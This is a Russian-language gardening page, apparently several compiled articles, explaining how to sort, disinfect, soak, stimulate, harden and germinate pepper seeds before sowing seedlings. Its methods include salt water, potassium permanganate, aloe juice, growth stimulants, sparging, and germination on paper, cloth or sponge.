3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как прорастить семена перца перед посадкой

Проращивание семян перца

Проращивание семян перца является одним из подготовительных процессов культивирования рассады этой культуры. Нельзя сажать посевной материал сразу в почву. Этот метод не оправдывает себя. Чтобы получить качественные сеянцы, необходимо провести подготовку.

Проращивание семян перца

Для чего проращивают перец

Такой способ выращивания сеянцев используют как для острого, так и сладкого видов. Зараженные грибковыми заболеваниями или другими бактериями семена обеззараживаются. Также этот метод способствует улучшению посевных качеств материала. Его всхожесть значительно повышается.

Если прорастить перец из семян, то рассада легче приспосабливается к условиям окружающей среды. Ростки имеют мощные стебли. Применение специальных препаратов влияет на будущие показатели урожайности культуры. Ведь семечки насыщают микроэлементами и питательными веществами. Проращивание ускоряет рост рассады и улучшает его защитный механизм.

Подготовка семени к проращиванию

Это многоэтапный процесс. Он требует приложения усилий и времени. Чтобы ускорить появление ростков, надо провести подготовительные мероприятия.

Выбор посевного материала

Семена перца быстро теряют всхожесть. Поэтому, покупая их, стоит обратить внимание на срок годности.

При покупке надо обратить внимание на фирму-производителя. Предпочтение отдают известным маркам. Если посевной материал обработан, то об этом пишут на упаковке. Его цена будет значительно выше, так как он имеет противогрибковую защиту, и его улучшают с помощью стимуляторов роста, микроэлементов.

Если же зернышки не поддавались обработке или нет уверенности в ее проведении, надо провести эту процедуру в домашних условиях. Иначе перцы будут плохо всходить, растение в будущем может болеть. Качественность урожая окажется под угрозой.

Отбор посевного материала

Перед тем как прорастить семена болгарского перца, надо их откалибровать и проверить на всхожесть. Для этого зернышки выстилают на бумагу и отбирают самые мелкие. Их для посадки не используют. Чтобы отличить пустотелый посевной материал от наполненного, нужно провести следующие действия:

  • в 1 л воды добавляют 35-40 г поваренной соли, перемешивают;
  • семена опускают в раствор примерно на 5 минут.

Некачественные зернышки всплывут, их удаляют. Пригодные упадут на дно. Чтобы подготовиться к следующему этапу, оставшиеся семена сладкого перца промывают пресной водой и просушивают. Это мероприятие производят непосредственно перед проращиванием.

Обеззараживание

Дезинфекция является важной составляющей данного процесса. От нее зависит здоровье будущих сеянцев. В домашних условиях реализовать протравливание семян можно с помощью перманганата калия. Это делают так:

  • готовят 1-2% раствор вещества, он должен быть бледно-розового цвета;
  • зернышки заворачивают в марлю;
  • опускают в жидкость на 20 минут;
  • после извлечения промывают проточной водой;
  • просушивают.

Семена необходимо продезинфицировать

Помочь обеззаразить посевной материал может такое средство, как Фитоспорин. Для этого в 1 стакан воды добавляют 4 капли препарата. Раствор губительно влияет на грибки и бактерии. Не составляет опасности для человека, животных и насекомых.

Перед помещением зернышек в раствор можно замочить их на некоторое время (менее 2 часов) в воде с температурой 40-45˚С. Предварительно надо завернуть в мягкую ткань. Чтобы прорастить семена перца, дезинфекцию проводят не раньше, чем за 2 дня до этого. Иначе они потеряют свои посевные качества.

Обработка стимуляторами роста

Прорастание будет хорошим, если насытить сладкий перец полезными веществами еще перед посадкой. Цели такой процедуры:

  • увеличение всхожести;
  • повышение иммунитета растений к болезням;
  • приспособление к неблагоприятным условиям окружающей среды на ранних этапах развития.

Хорошим источником полезных элементов является такое доступное органическое вещество, как древесная зола.

Она содержит много витаминов и микроэлементов. Раствор готовят таким образом: в 1 л воды добавляют 20 г золы, настаивают сутки, регулярно помешивают. Завернутые в марлю зернышки опускают на 5 часов в приготовленное средство. Потом промывают и просушивают. Зольную воду можно хранить достаточно долго.

Чтобы развитие растений было быстрое, надо стимулировать посевной материал. С этой целью применяю биологические и химические вещества. Куриное яйцо и сок алоэ — одни из самых доступных средств, которые содержат массу полезных веществ. Их можно сочетать – сок смешивают со взбитым яйцом и заливают семена. После замачивания в таком растворе используют также покупные препараты: «Энергена», «Эпин-экстра», «Циркон». Их применяют строго по прилагаемой инструкции.

Подогрев

Некоторые огородники используют такой способ, чтобы ускорить проращивание семян перца. После всех вышеупомянутых процедур семенапрогревают. С этой целью надо выложить их на подоконник с солнечной стороны или поместить в теплую воду (40˚С). Можно использовать также термос. У хорошо прогретого посевного материала активизируются процессы роста, тогда они будут лучше всходить.

Проращивание семян

Процедуру начинают в феврале – в начале марта. Чтобы правильно прорастить семена, для перца берут талую воду.

Она хорошо активизирует биологические процессы и стимулирует рост сеянцев. Если используют воду из-под крана, ее надо отстоять. Тогда хлор, который содержится в жидкости, испарится.

Семена раскладывают на сложенную в несколько слоев марлю или салфетку. Сверху укрывают так же. Можно использовать косметические диски, губку. Смачивают водой. Помещают в сосуд с крышкой, оставляют в среде с температурой 25-28˚С. Добиться таких показателей можно с помощью радиатора. Каждый день его следует открывать, чтобы проветрить. Можно емкость не использовать. Но тогда надо следить, чтобы ткань оставалась влажной. А в вечернее время накрывают полиэтиленовой пленкой.

Полноценное проращивание перца проихсодит на протяжении 7-10 дней.

Самые сильные семена дадут ростки в сроки, равные 3-5 дням. Иногда на это требуется больше времени. Тогда для быстрого прорастания семян перца используют раствор хлорного отбеливателя или селитры. В них помещают зернышки на 5 минут. Это способствует разрушению оболочки и активизации процесса. Посадку проклюнувшихся семечек совершают в специальные емкости.

Проращивание семян перца на рассаду в домашних условиях

Проращивание перца – завершительный этап обработки семян перед посевом на рассаду. Этот метод применяют на практике не все овощеводы. Некоторые считают, что без этой манипуляции не обойтись, так как она в разы улучшает всхожесть семян. Другие утверждают, что проращивание семян перца перед посадкой – обременительная и не обязательная операция, не влияющая на конечный результат.

Нужно ли проращивать семена перца

Прорастание – фаза перехода семян из состояния покоя к активному периоду жизнедеятельности. Благоприятные факторы (подходящая температура, достаточное количество влаги и воздуха) способствуют быстрому пробуждению зародыша.

Сухие зёрнышки перца прорастают в почве очень долго, поэтому опытные огородники обязательно проводят их замачивание. Другие идут дальше и начинают проращивать семена. Этот агроприем позволяет расходовать меньше энергии и питательных веществ посевному материалу при проклёвывании, тем самым стимулируя быстрое появление всходов. В этом случае проклевываются даже те семена, которые при традиционном методе посадки в грунт не дали бы ростков.

Проращивать перец из семян в домашних условиях нужно в следующих случаях:

  • редкий сорт, когда каждое семечко на счету;
  • старый посевной материал, который необходимо пробудить;
  • сроки посева пропущены, и нужно ускорить процесс прорастания.

Если зёрнышки свежие, их много, время посадки не пропущено, то процедуру можно не проводить и ограничиться замачиванием. Это позволит разбудить зародыши и поможет быстрее взойти сеянцам.

В любом случае, чтобы посевы быстро и дружно взошли, необходимо правильно провести процедуры для ускорения проклевывания зернышек. А нужно ли замачивать или проращивать перцы перед посадкой, каждый огородник решает для себя сам.

Достоинства и недостатки метода

Посадка проклюнувшихся семян перца имеет свои преимущества:

  • дружная и быстрая всхожесть сеянцев;
  • прорастание даже слабых зёрнышек;
  • появление всходов даже при глубокой посадке.

При посеве перца сразу в грунт всходы появляются через 7-15, а иногда и 20 суток. При проращивании ростки могут проклевываться на 5 день и быстрее всходят.

Не меньше у способа и недостатков:

  • проросшие семена требуют особой аккуратности при переносе в грунт;
  • зернышки с поврежденными корешками могут не взойти;
  • сеянцы сразу погибнут в случае высыхания или переувлажнения субстрата.

Метод проращивания позволяет взойти даже слабым сеянцам, которые бы при обычных условиях посадки не дали бы всходов.

Подготовительные этапы к проращиванию

Перед тем как прорастить семена перца для посадки, желательно провести выбраковку и протравливание посадочного материала. Зернышки помещают в воду с солью, что позволяет выбраковать нежизнеспособные пустышки. Затем их погружают в обеззараживающий раствор.

Процедура стимуляции проводится в тех случаях, когда нужно быстро прорастить семена перца.

Выбраковка

В стакане воды комнатной температуры растворяют чайную ложку соли. В жидкость помещают сухие семена перца и оставляют на 20 минут, периодически помешивая. Оставшиеся на поверхности пустышки выкидывают, потонувшие экземпляры извлекают и обязательно промывают под проточной водой.

Протравливание

При обеззараживании посадочного материала опытные земледельцы используют следующие средства в домашних условиях:

  • сок алоэ;
  • хлоргексидин;
  • чесночный настой;
  • Фитоспорин-М.

Сок алоэ используется при замачивании не только в качестве эффективного и экологически чистого протравителя. Он помогает семенам быстрее прорасти, тем самым выступая как биологический стимулятор роста.

Как правильно замочить семена в соке алоэ:

  • Листья растения помещают в холодильник на сутки для лучшей отдачи сока.
  • Выжимают жидкость и погружают в нее посадочный материал.
  • Сок должен слегка прикрывать поверхность зернышек, чтобы они не задохнулись.
  • Оставляют для замачивания и протравливания на сутки.
  • Набухшие зёрнышки отправляют на проращивание.

Хлоргексидин – безопасный и эффективный протравитель. Перед применением нет необходимости его разводить. Семена погружают в обеззараживать на полчаса, промывают под проточной водой и отправляют на проращивание.

Для того чтобы сделать настой из чеснока потребуется половина стакана воды и 2 зубчика растения, измельченных при помощи чеснокодавки. В подготовленный препарат помещают зернышки и оставляют в нем на пару часов.

Фитоспорин-М безопасно и эффективно обеззараживает семена перед посадкой. Средство используют строго по инструкции.

Большинство огородников продолжают использовать раствор марганцовки в качестве протравителя. Но как показала практика вещество не способно убить все болезнетворные бактерии на посевном материале, из-за чего может пострадать всхожесть.

Стимуляция

Замачивание в стимуляторах роста – лучший способ, как ускорить прорастание семян перца. Чтобы зернышки быстрее проклюнулись используют такие средства, как Эпин экстра, Циркон, Энерген и др.

Рабочий раствор готовят согласно инструкции по применению и замачивают посадочные материалы в течение 3-6 часов. После обработки посадочные экземпляры можно сразу отправлять на проращивание.

Способы проращивания

Для проращивания семян необходимо создать благоприятные условия: температуру от +23 до +25 градусов, достаточную влажность и поступление кислорода. Если зернышкам недостаточно тепла, а влаги в избытке – они могут не прорасти и загнить. Отсутствие кислорода приведет к тому, что зародыши задохнутся. Поэтому этот агроприем требует от овощевода регулярного наблюдения за проращиваемыми семенами.

Через сколько дней появятся первые корешки зависит не только от температурных условий, влажности и поступления кислорода к зародышам. На то, как быстро появятся проростки, влияют и другие факторы: возраст семян, использование стимуляторов, ускоряющих рост.

Для процедуры понадобится туалетная бумага, хлопчатобумажная ткань или влажный субстрат. На ватных дисках и марле проращивание не рекомендовано − проклевывающиеся корешки будут цепляться за «рыхлую» поверхность и их будет потом сложно отцепить, не повредив.

На туалетной бумаге

Проращивание семян перца на туалетной бумаге – хороший и быстрый способ, позволяющий получить рассаду в короткие сроки. Альтернативой служат бумажные салфетки.

Дополнительно понадобится целлофановый пакет, желательно непрозрачный. Для этих целей идеально подойдет чёрный мешок для мусора.

На целлофане раскладывают в 2-3 слоя туалетную бумагу или салфетки. Поверхность материала обильно смачивают теплой, не горячей водой при помощи пулевизатора. Некоторые экспериментаторы поливают бумагу кипятком, а потом удивляются, почему проклюнулись не все зародыши и что делать с испорченным посадочным материалом.

Зёрна перца раскладывают таким образом, чтобы между ними было расстояние не менее 2 см и отступ 3-4 см от краев. Делают нетугую скрутку.

Свернутый кулек помещают в стакан, заполненный на 3-4 см теплой водой. Сверху накрывают целлофаном и ставят в теплое и темное место.

Туалетную бумагу также можно уложить на дно контейнера, обильно смочить теплой водой и разложить на ней перчики. Емкость накрывают крышкой и ставят в тепло. Регулярно проветривают и следят, чтобы бумага не пересыхала.

Зёрна при таком методе начинают прорастать примерно на 5 день. Для более быстрого проращивания воду можно заменить раствором Эпина (2 капли на половину стакана жидкости).

На ткани

Традиционный и самый правильный метод проращивания болгарского перца на рассаду – использование хлопчатобумажной ткани. Сложенный в несколько слоев лоскут обильно увлажняют. При этом семена не должны оказаться в воде – избыток влаги приведет к гибели зародышей. Сверху зернышки также накрывают влажной тканью и прикрывают целлофаном. Убирают в теплое место. Ежедневно проводят проветривание и при необходимости увлажнение ткани. Пророщенные зародыши, достигшие по размеру собственное семя сразу же сажают в грунт.

На субстрате

Прорастить семена острого и сладкого перца также можно при помощи Вермикулита или Перлита. Субстрат обильно, но не чрезмерно увлажняют, помещают на него зернышки, накрывают полиэтиленом или стеклом, убирают в тепло. Ежедневно проветривают и проверяют увлажненность материала. Как только корешки наклевываются, проростки высаживают в подготовленный грунт для перцев.

Заключение

Вырастить хорошую, здоровую рассаду перца можно и без проращивания семян при соблюдении правил агротехники. Достаточно сажать в грунт зернышки замоченными в стимуляторах, которые и так ускорят появление всходов. Использовать агроприем или нет во многом зависит от количества и качества посадочного материала.

Чем обработать семена перца на рассаду для быстрого прорастания?

Сладкий перец является одной из популярных культур, выращиваемых на дачном участке. Сложность культивации этого растения заключается в длительном вегетационном периоде, именно поэтому в средней полосе применяется только рассадный способ. Но для получения крепкой рассады и уверенности в качестве будущего урожая надо знать, как правильно замачивать семена перца перед посевом.

Основные правила и рекомендации по выбору посевного материала

Первый и самый важный этап – подбор семян. При выборе нужно обращать внимание на следующие критерии:

  • на упаковке должна содержаться вся информация о товаре: производитель, сорт, агротехника;
  • с даты изготовления должно пройти не более 3 лет;
  • сорт перца должен быть адаптирован к климату полосы, где планируется его выращивать.

Гибридные культуры наиболее устойчивы к неблагоприятным факторам среды и славятся отменным урожаем, но совершенно не подходят для самостоятельной заготовки на семена из-за вырождения генов.

Собственный посевной материал, собранный от выращенных на огороде перцев, можно использовать только от обычных сортов, а не гибридов. Гарантированную всхожесть дадут только те семечки, которые правильно хранились в герметичной емкости, в сухом месте при температурном режиме от 15 до 18 °С.

Необходимость предпосадочной обработки

Замачивание семян перца перед посадкой не требуется в южных регионах, так как климат позволяет культуре вызревать без использования рассадного метода. Не нуждаются в предварительной подготовке семена, обработанные производителем фунгицидами и стимуляторами роста. Такой материал обычно имеет пометку F1 и выпускается в виде драже и гранул, сеют его без предварительных манипуляций.

В остальных случаях предварительная обработка семян позволит решить несколько проблем:

Быстрое прорастание

Перец долго набирает зеленую массу перед плодоношением, потому в средней полосе с января необходимо готовить рассаду. Проблема в том, что семена этой культуры всходят медленно, долго «сидят» в почве, а могут и вовсе не прорасти.

Предварительное замачивание создает оптимальные условия для прорастания: при сухом посеве всходы появятся через 13-20 суток, а обработанные прорастают уже спустя 4-14 дней.

Крепкая рассада перцев

При правильной подготовке из семян появятся здоровые и сильные растения, устойчивые к болезням, вредителям и погодным сюрпризам. Загодя в результате калибровки можно отсортировать непригодные для посева семечки перцев. Дезинфекция специальными растворами защитит культуру от грибка и бактерий, а подпитка микро- и макроэлементами даст хороший старт для активного развития.

Экономия времени

Благодаря предварительной обработке можно существенно сэкономить время на проращивание и ожидание всходов. При прорастании отбираются только жизнеспособные перцы, потому легко можно спрогнозировать количество крепкой рассады и рассчитать необходимый объем посевного материала.

Последовательность обработки семян перца перед посадкой

Подготовка семечек сладкого и острого перца, а также баклажанов проходит в несколько этапов:

  1. Сортировка.
  2. Прогревание.
  3. Дезинфекция с помощью специальных средств.
  4. Вымачивание в питательных растворах.
  5. Закаливание.
  6. Проращивание.

Проводить все процедуры подряд нет необходимости, но обязательно нужно отбраковать непригодные семена и провести обеззараживание материала для посадки. Вместо замачивания можно провести барботирование при наличии необходимого оборудования. Остальные этапы обработки перца проводятся на усмотрения огородника. Каждая процедура осуществляется с определенной целью и по установленной технологии.

Прогревание

Семена прогревают, чтобы они взошли в большем процентном соотношении по сравнению с необработанными экземплярами. Если посадочный материал перца хранился при низкой температуре, его следует вывести из состояния покоя. Термическая обработка осуществляется за 30 дней до посева. Для этого семечки помещают в тканевый мешочек и подвешивают вблизи батареи.

Протравливание

Перед посадкой семена перца необходимо продезинфицировать, так как часто на их поверхности находятся споры грибка или болезнетворные бактерии. Для этого посевной материал помещают в раствор марганцовки, перекиси водорода или зеленки на 15-30 минут. После семечки нужно промыть чистой водой и немного подсушить.

Многие дачники считают метод протравливания устаревшим и малоэффективным, потому для обеззараживания используют фунгицидные средства.

Обработка составами с макро- и микроэлементами

Замачивание семян в питательных растворах позволят насытить перцы ценными элементами, дав тем самым прекрасный старт для развития. Наиболее популярен для этой цели зольный гидрораствор, так как он содержит около 40 полезных минералов. Чайную ложку золы размешивают в 200 мл воды. Туда погружают семена в марлевом мешочке на 5 часов. После их нужно промыть.

Обработка стимуляторами роста

Чтобы сократить время на прорастание и улучшить всхожесть, можно использовать препараты для стимуляции роста. Насыщение семян витаминами и необходимыми для развития веществами сделает растение более сильным и выносливым, а также гарантирует обильный урожай.

Процедуру проводят после дезинфекции. Готовые препараты разводят по инструкции в теплой воде (40 °С). Когда жидкость остынет до 20 °С, туда погружают семечки, завернутые в ткань. Можно применять такие препараты:

Хорошо зарекомендовали себя и средства, приготовленные по народным рецептам, вроде крапивного настоя, раствора янтарной кислоты или сока алоэ.

Вымачивают семена с помощью одного препарата от 2 часов до суток. После материал следует посадить.

Проращивание

Для ускорения прорастания многие дачники предпочитают проращивать семена. Нужно взять влажную многослойную марлю, ткань, или ватные диски, разместить их на блюдце или в контейнере. Сверху выложить семечки, накрывая полиэтиленовым пакетом, чтобы получился своеобразный парник.

Для проращивания емкость с посадочным материалом нужно убрать в теплое место, так как перец активизируется при 23-28 °С.

Важно следить за влажностью подложки. Ростки должны появиться уже спустя 3 суток, их следует аккуратно посадить в контейнер для рассады.

Закаливание

Закаливать культуру для укрепления иммунитета можно после протравливания и вымачивания в растворе стимулятора роста. Семечки могут быть чуть проклюнутыми, но не пророщенными. Существует 2 способа закаливания перца:

  • С использованием холодильника: влажные набухшие семена положить в пластиковый пакетик, не завязывая его. Пакет на ночь кладут на верхнюю полку холодильника, в дневное время держат при комнатной температуре. Так повторяют до 4 дней, а после высаживают.
  • На контрасте температуры воды. Посадочный материал нужно замочить в прохладной воде температурой 2-4 °С, через 3-4 часа сменить воду на теплую и держать до проклевывания. После опять залить холодной водой и спустя 2 часа посадить в лоток на рассаду.

Барботирование

Необычной альтернативой замачиванию является барботирование. Суть процедуры состоит в насыщении семени кислородом. В результате окислительной реакции очищается поверхность семечек, уничтожается патогенная микрофлора, ускоряется всхожесть.

Для использования такого метода потребуется тара: банка, ведро, бочонок или бидон – и компрессор для аквариума.

Емкость заполняется теплой водой (40-50 °С) на две трети, туда погружаются семена и один конец шланга. Другой стороной шланг присоединяют к компрессору. В воду рекомендуется добавить стимулятор роста: это улучшит процесс поглощения полезных элементов из раствора.

Держат семена до прорастания в течение 1-2 суток, после можно закаливать или сразу посадить. Перед высевом семечки нужно немного подсушить.

Замачивание семян: польза и особенности проведения

Замачивают посевной материал после прогревания и протравливания. Такая манипуляция ускоряет набухание и появление ростка, позволяет отсортировать жизнеспособные семена от непригодных, помогает рассчитать численность кустиков перца.

Процедура замачивания имеет несколько особенностей:

  • Емкость подбирается в зависимости от объема семян, каждый сорт замачивается отдельно. На таре помещается бирка с названием сорта, датой и временем начала обработки.
  • Дно посудины выстилают подстилкой (марля, тканевая салфетка). Воды или раствора добавляют столько, чтобы напитать материал, лишняя влага удалятся.
  • Семечки равномерно распределяются по поверхности ткани с расстоянием в 1 см.
  • Концами влажной марли или лоскута накрывают семена сверху. Поверх надевается прозрачный пакет.
  • Емкость должна находиться в помещении с температурным режимом 25-28 °С.
  • Ежедневно нужно приоткрывать укрытие для проветривания на 5-10 минут.
  • Поддерживать влажность подложки лучше опрыскиванием из пульверизатора.

Подготовка к замачиванию

Семена замачиваются за 10-14 дней до высадки в контейнер для рассады (начало или середина февраля).

Первым этапом подготовки семенного материала является калибровка. Обычно отбираются самые крупные семечки. Выбраковываются очень мелкие, поврежденные или изменившие окрас зернышки.

Вторым действием должна быть проверка на всхожесть. Даже отсортированные по внешним признакам семечки могут быть недозревшими, поэтому отобранные зернышки погружают в соляной раствор. Такой способ поможет определить пустые семена без зародыша. Непродуктивные экземпляры всплывают, плодородные же, наоборот, опускаются на дно.

Длительность процедуры замачивания семян перца

Сроки вымачивания зависят от сорта перца и выбранного средства. При соблюдении всех рекомендаций проклевывание наступает через 10-14 дней, максимальный срок – 20 суток. Если использовать готовые агропрепараты, то длительность замачивания должна соответствовать указанной в инструкции. Средства собственного приготовления предполагают выдержку семян от 5 часов до нескольких дней.

Популярные составы для замачивания семян перца

Для предпосевной обработки семенного материала разработано множество рецептов приготовления раствора, поэтому каждый дачник с легкостью подберет для себя подходящий вариант.

Солевой раствор

Гидрораствор с поваренной солью применяют для отбраковки пустых нежизнеспособных семечек. Для приготовления средства чайную ложку соли растворяют в ½ стакан воды. Семена помещаются на полчаса. После всплывшие выбрасывают, а оставшиеся промываются простой водой.

Перекись водорода

3%-ый раствор перекиси водорода применяют для протравливания. Откалиброванные зернышки завязывают в марлевый кулечек и кладут в раствор на 30 минут. Далее семечки вынимают и тщательно промывают от остатков средства. Этим составом также можно продезинфицировать лотки для рассады и почвенный субстрат.

Марганцовка

Традиционное средство для обеззараживания семян – раствор марганцовки. Для замачивания 1 г перманганата калия разводят в 0,2 л теплой воды. В готовый раствор помещают семена в марлевом мешочке на 20-30 минут. Далее зернышки промывают и выкладывают для подсушивания на салфетку.

Сок алоэ

Обработать семечки перед посевом для протравливания и ускорения роста можно с помощью сока алоэ. Для приготовления средства подходит растение возрастом от 3 лет. Выжатую жидкость на несколько часов помещают в холодильник. Чтобы приготовить гидрораствор, сок разводят с водой в равных частях. Замачивание длится от 1 часа до суток. После семена подсушивают, но не промывают.

Водка

Некоторые дачники используют обыкновенную водку для протравливания и ускорения прорастания семени.

Спирт растворяет в оболочке семечка эфирные масла, которые тормозят проклевывание.

Замачивать семена в водке нужно не более 15 минут, а после помыть их под проточной водой.

Чтобы пробудить жизненные силы внутри семечка и ускорить его развитие, применяются препараты для стимуляции роста. Самым популярным является Эпин. Уникальность средства – в его составе: активным веществом является фитогармон, влияющий на деление клеток.

2 капли препарата растворяют в 100 мл теплой воды и вымачивают в нем семена 2-4 ч. После промывать не требуется. Раствор можно использовать и для проращивания.

Фитоспорин

Опытные огородники отдают предпочтение безопасным биопрепаратам. Одним из таких является Фитоспорин-М. В его составе содержатся бактерии сенной палочки, которые подавляют развитие фитопатогена. Полезные микроорганизмы покрывают семя микропленкой, которая защитит будущие всходы от бактериальных и грибковых инфекций. В препарате содержится Гуми, которое активизирует рост и развитие будущего растения.

Раствор готовят из 4 капель жидкого средства и стакана теплой воды. Замачивание длится от 12 до 24 часов. Промывать семена не нужно.

Другие рецепты

Помимо популярных средств существуют иные не менее эффективные составы для замачивания:

  • Раствор зеленки. 1 мл аптечного антисептика требуется развести в половине стакана воды и вымачивать материал полчаса.
  • Пищевая сода. 10 г вещества растворяют в литре теплой воды и замачивают зернышки на сутки, после хорошо промывают и высушивают.
  • Крапивный раствор. 1 столовая ложка сухой крапивы заваривается стаканом кипятка. После остывания туда погружают семена на 2-3 часа, смывать состав не требуется.
  • Янтарная кислота. Сначала готовят 1%-ный раствор (1 г на литр воды). После получившую жидкость разводят в соотношении 40 мл на 1 л. Длительность вымачивания – сутки.
  • Настой из чеснока. 3 зубца овоща нужно размять в кашицу, залить 100 мл воды и настаивать сутки. Дезинфицировать семена нужно в течение 30 минут.

Предпосевная подготовка семян перца позволяет ускорить прорастание, защитить от заражения и повысить иммунитет будущих растений. А совокупность этих условий гарантирует качественный урожай.

Подготовка семян перца к посеву: основные способы и правила

Перцы относятся к культурам, семена которых требуют тщательной подготовки к посеву. Нужно ознакомиться с основными процедурами и правилами их выполнения, чтобы избежать ошибок и обеспечить семенам наилучшие условия для дальнейшего роста.

Основные этапы предпосевной обработки семян перца

Начинать готовить семена к посеву можно уже в конце февраля в холодных областях и в первой декаде марта в южных и центральных регионах России. Такая процедура поможет не только повысить урожайность будущих растений, но и продезинфицировать посевной материал, а также обеспечить дружное прорастание.

Перед проведением обработки внимательно изучите упаковку. Многие производители сами выполняют все необходимые процедуры, и такие семена нужно сразу сеять в грунт.

В некоторых источниках указывается, что перцу из всего перечня подготовительных работ требуется одна-две. Большинство огородников не разделяет такое мнение и подвергает семена большему количеству процедур, считая это более эффективным. Вы также можете последовать их примеру, исключая некоторые работы по мере необходимости.

Калибровка

Это разделение семян по качеству и пригодности к посеву — плохие выбрасываем, подходящие оставляем. Проводите её таким образом:

    Высыпьте семена на ровную поверхность и удалите все, имеющие изъяны (пятна, трещины и т. д.) или слишком маленькие.

Для посева нужно отобрать крупные семена без дефектов

В растворе соли пустотелые семена перца всплывают на поверхность

Обеззараживание

Приготовьте раствор марганцовки (1 г порошка на 200 мл воды) или перекиси водорода (2 мл на 200 мл воды) и поместите семена на 15 или 7 минут соответственно. После обработки не забудьте их тщательно промыть.

Раствор марганцовки для обеззараживания семян должен быть ярко-розовым

Ещё одним способом обеззараживания является прогревание. Благодаря ему можно не только уничтожить болезнетворные организмы, но и ускорить прорастание семян перца. Порядок действий:

  1. Налейте в термос горячую воду (+50 о С).
  2. В марлевый мешочек насыпьте семена и поместите заготовку в термос на 20 минут.

Замачивание

Процедура необходима в первую очередь для того, чтобы смыть с семян перца эфирные масла и облегчить их прорастание.

В воде

Это самый простой способ замачивания, проводят его так:

  1. На дно тарелки кладут кусок ткани (х/б, рогожка), на него выкладывают семена.
  2. Наливают воды столько, чтобы она покрывала семена на 2–3 мм.
  3. Ставят заготовку в тёплое (+23–28 о С), защищённое от сквозняка место на 12–14 часов. В течение этого периода следят, чтобы ткань не пересыхала и семена постоянно находились в воде. Обязательно менять её каждые 4 часа.

При замачивании семена перца должны быть покрыты жидкостью на 2–3 мм

В медовом растворе

Мёд относится к природным биостимуляторам и способен не только ускорить прорастание семян, но и обогатить их полезными веществами.

Мёд является хорошим биостимулятором для любых семян

  1. 1 чайную ложку мёда разведите в 150–200 г тёплой воды.
  2. Остудите смесь до комнатной температуры.
  3. Осторожно залейте семена необходимым количеством раствора и оставьте на 8 часов в тёплом месте.

В соке алоэ

Можно воспользоваться соком алоэ — природным обеззараживающим средством — для замачивания семян перца. Действуйте таким образом:

  1. Срежьте нижние трёхлетние мясистые листья.
  2. Промойте, заверните в тёмную ткань и уберите в холодильник (на дверцу) на неделю.
  3. Измельчите листья и выжмите из них сок.
  4. Полученную жидкость разведите водой (её должно быть такое же количество) и залейте смесью семена на 18 часов.

Для получения сока алоэ нужно использовать здоровые нижние листья старше трёх лет

В зольном растворе

Зола — источник питательных веществ, и садоводы часто пользуются ей при предпосевных работах. Для замачивания семян:

  1. В кипятке (100 г) растворите 1 чайную ложку золы.
  2. Перемешайте и дайте смеси настояться в течение 2 суток при комнатной температуре.
  3. По прошествии этого времени залейте семена и оставьте на 10 часов.

Раствор золы часто применяется для замачивания семян

В растворах биостимуляторов

Если вы не доверяете народным средствам, можно прибегнуть к помощи биостимуляторов:

  • Эпин — 2–4 капли развести в 100 мл воды и залить семена на 6 часов;
  • Гумат калия — 1 мл препарата развести в 100 мл воды и залить семена на 12 часов;
  • Циркон — 1–2 капли развести в 300 мл воды и залить семена на 14 часов;
  • Новый идеал — 2 г порошка развести в 100 мл воды и залить семена на 30 минут.

При приготовлении растворов биостимуляторов нужно тщательно соблюдать дозировку, которая указана в инструкциях

Барботирование

Если у вас есть аквариумный компрессор, можно провести барботирование семян перца и при этом обойтись без замачивания, поскольку семена не только теряют оболочку из эфирных масел, но и насыщаются кислородом, что значительно ускоряет их прорастание.

Барботирование — это процесс пропускания газа (в нашем случае кислорода) или пара через жидкость (в нашем случае воду).

Во время барботирования семена хорошо насыщаются кислородом

  1. Наполните банку водой и насыпьте в неё семена.
  2. Опустите конец шланга от аквариумного компрессора на дно банки.
  3. Включите компрессор и обрабатывайте семена в течение 24 часов.

Видео: барботирование семян

Закаливание

Процедура будет полезна огородникам из холодных регионов (Урал, Сибирь, Северо-Западная область), особенно при посадке сортов перца, предназначенных для открытого грунта, или поздних. Проводите её так:

  1. На дно тарелки поместите увлажнённый кусок ткани (х/б, рогожка).
  2. На него положите набухшие, но не проросшие семена.
  3. Накройте их ещё одним куском увлажнённой ткани.
  4. Поместите тарелку в полиэтиленовый пакет и уберите заготовку в холодильник на 2 суток. В течение этого времени проверяйте, чтобы ткань не пересыхала, и своевременно увлажняйте её.

Закаливать нужно наклюнувшиеся, но ещё не проросшие семена перца

Проращивание семян перца

После всех указанных мероприятий можно приступать к проращиванию семян перца. На появление ростков уходит 1–3 недели. Перемещать в грунт можно будет по достижении ими размеров чуть более размера семечка.

На туалетной бумаге

Один из самых дешёвых и доступных методов. Порядок действий:

  1. На дно контейнера или тарелки постелите туалетную бумагу в 4–5 слоёв и увлажните из пульверизатора.
  2. На неё выложите семена и накройте их ещё одним увлажнённым куском туалетной бумаги.
  3. Если вы использовали контейнер, то накройте его крышкой, тарелку уберите в полиэтиленовый пакет, а затем поставьте заготовку в тёплое (+25 о С) место. Помните, что бумага всё время должна быть влажной.

Туалетная бумага благодаря влаговпитывающим свойствам хорошо подходит для проращивания семян перца

На ватных дисках

Более современный и менее травматичный вариант проращивания семян — на вате. В этом случае нет риска, что проклюнувшиеся ростки застрянут в волокнах и сломаются при попытке их извлечь. Действуйте таким образом:

  1. На дно ёмкости уложите влажные ватные диски в 3–4 слоя.
  2. На них поместите семена и накройте их ещё 1–2 слоями влажных ватных дисков.
  3. Накройте ёмкость крышкой (или уберите в пакет) и поставьте в тёплое место. Не забывайте поддерживать диски в увлажнённом состоянии.

Ватные диски не травмируют ростки перца благодаря гладкой поверхности

В опилках

Для проращивания семян перца подойдут сухие опилки, полученные от лиственных деревьев. Используют их таким образом:

  1. В ёмкость насыпают опилки слоем 1,5–2 см.
  2. Проливают их кипятком. Излишки влаги сливают, а субстрат остужают (при касании кожа рук должна ощутить тепло, а не обжечься).
  3. На него выкладывают семечки и присыпают их тонким (2–3 мм) слоем сухих опилок.
  4. Накрывают ёмкость крышкой (или убирают в пакет) и ставят в тёплое место. Опилки всегда должны быть увлажнены.

В губке

Это относительно новый способ. Семена перца быстро (5–7 дней) прорастают за счёт большого количества тепла и влаги, которые губки хорошо сохраняют. Порядок работы:

  1. Намочите губку и на неё выложите семена.
  2. Накройте их второй увлажнённой губкой.
  3. Скрепите губки резинкой, положите в контейнер и уберите в полиэтиленовый пакет.
  4. Положите заготовку в тёплое место. Во избежание пересыхания губок следите, чтобы на дне контейнера была вода слоем 2–3 см.

Губка обеспечивает семена перца нужным количеством тепла и влаги

В гидрогеле

